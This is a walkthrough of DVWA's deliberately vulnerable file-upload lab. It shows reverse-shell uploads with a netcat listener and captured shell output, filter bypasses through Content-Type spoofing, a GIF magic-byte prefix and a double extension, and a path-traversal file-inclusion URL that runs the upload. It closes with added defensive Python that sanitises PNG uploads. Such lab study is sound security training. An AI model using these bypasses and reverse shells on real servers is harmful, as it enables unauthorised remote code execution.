Security level: low
Create a PHP reverse shell file, rev.php.
Reference: https://www.revshells.com/
Listening IP: 192.168.170.131
Port: 9001
Netcat listener command: nc -lvnp 9001
Upload the file rev.php,
then visit the URL: http://192.168.170.131/hackable/uploads/rev.php
and you have a reverse shell:
Output:
┌─[✗]─[aftab@parrot]─[~/Downloads/dvwa]
└──╼ $nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.170.131] from (UNKNOWN) [172.17.0.2] 54022
SOCKET: Shell has connected! PID: 331
whoami
www-data
uname
Linux
Security level: medium
This time the server blocks the PHP file. We can bypass that by changing the request header:
Content-Type: application/x-php
==> Content-Type: image/png
We can also do that from the browser: open Inspect Element and go to the Network tab, resubmit the upload so the request shows up there, then right-click that upload request and choose Edit and Resend.
Make the changes and hit the Send button, visit the URL, and you have a reverse shell.
Security level: high
Changing the Content-Type is not working; maybe the server is verifying the file header signature.
Add GIF98; at the start of our exploit file and rename it to rev.php.png.
But when we visit it directly it is not working, so we use file inclusion (security level: high):
URL: http://192.168.170.131/vulnerabilities/fi/?page=file/../../../hackable/uploads/rev.php.png
and we have a reverse shell on our netcat listener.
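All three levels fail because the server trusts something the client controls: the file name, the Content-Type header, or the first few bytes of the file. The following is an added example (not from the original write-up and not DVWA's code; the function names and sample bytes are assumptions constructed here) of an upload handler in Python that ignores the client's name and type, rebuilds the PNG from its CRC-checked critical chunks, and stores it under a server-chosen name.

```python
# Added example; sanitize_png / accept_upload are illustrative names, not DVWA's code.
import secrets, struct, zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
KEEP = {b"IHDR", b"PLTE", b"IDAT", b"IEND"}  # critical chunks; metadata is dropped

def sanitize_png(data: bytes) -> bytes:
    """Rebuild a PNG from CRC-checked critical chunks, or raise ValueError."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG signature")
    out, seen, pos = [PNG_SIG], [], len(PNG_SIG)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length
        if end > len(data):
            raise ValueError("truncated chunk")
        (crc,) = struct.unpack(">I", data[end - 4:end])
        if zlib.crc32(data[pos + 4:end - 4]) != crc:  # CRC covers type + body
            raise ValueError("bad chunk CRC")
        seen.append(ctype)
        if ctype in KEEP:
            out.append(data[pos:end])
        pos = end
        if ctype == b"IEND":
            break  # bytes appended after IEND are discarded
    if len(seen) < 3 or seen[0] != b"IHDR" or seen[-1] != b"IEND" or b"IDAT" not in seen:
        raise ValueError("missing IHDR/IDAT/IEND")
    return b"".join(out)

def accept_upload(filename: str, client_content_type: str, data: bytes):
    """Return (stored_name, clean_bytes); client name and Content-Type are ignored."""
    return secrets.token_hex(16) + ".png", sanitize_png(data)  # server-chosen name

# --- constructed sample inputs (not from the original page) ---
def chunk(ctype: bytes, body: bytes) -> bytes:
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))

def make_png(extra: bytes = b"", trailer: bytes = b"") -> bytes:
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # 1x1, 8-bit grayscale
    return (PNG_SIG + chunk(b"IHDR", ihdr) + extra +
            chunk(b"IDAT", zlib.compress(b"\x00\x00")) + chunk(b"IEND", b"") + trailer)

MARKER = b"<?php /* placeholder, no payload */ ?>"  # stands in for script content

if __name__ == "__main__":
    dirty = make_png(chunk(b"tEXt", b"c\x00" + MARKER), trailer=MARKER)
    stored, clean = accept_upload("rev.php.png", "image/png", dirty)
    print(stored, len(dirty), len(clean), MARKER in clean)
```

The rev.php upload and the GIF98;-prefixed rev.php.png from the write-up both fail at the signature check with ValueError. Pixel data is not decoded here, so a production handler would still re-encode the image with an image library and keep the upload directory out of reach of any file-inclusion parameter.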
Happy Hacking